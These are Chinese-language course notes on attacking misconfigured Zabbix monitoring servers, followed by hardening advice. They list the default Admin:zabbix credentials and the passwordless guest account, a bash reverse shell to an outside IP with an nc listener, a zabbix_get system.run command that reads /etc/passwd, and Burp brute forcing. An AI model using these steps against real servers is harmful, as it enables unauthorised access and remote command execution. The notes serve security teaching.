本文为苏尚武老师运维安全课程课程笔记
- zabbix配置不当
- zabbix弱口令
- zabbix注入利用
- 修复建议
没有更改默认口令,没有更改密码。默认口令Admin:zabbix 以及默认的guest账户没有密码
进入zabbix管理页面,添加脚本。然后执行系统命令,获取其他信息得到管理权限
监控项监控端口ip
bash -i > & /dev/tcp/45.xx.xxx.x1/6666 0>&1
nc-lvp 6666
zabbix-get 命令调用
zabbix_get -s 172.18.0.4 -k ‘system.run[cat /etc/passwd]’
老版本burpsuite爆破
抓包使用intruder进行爆破
注入漏洞
使用guest账户进去打开页面,再注入,查看系统信息
修复建议
1、放在内网
2、不要以root启动
3、修改默认密码
4、禁用guest账号
5、401认真
6、备份数据、升级版本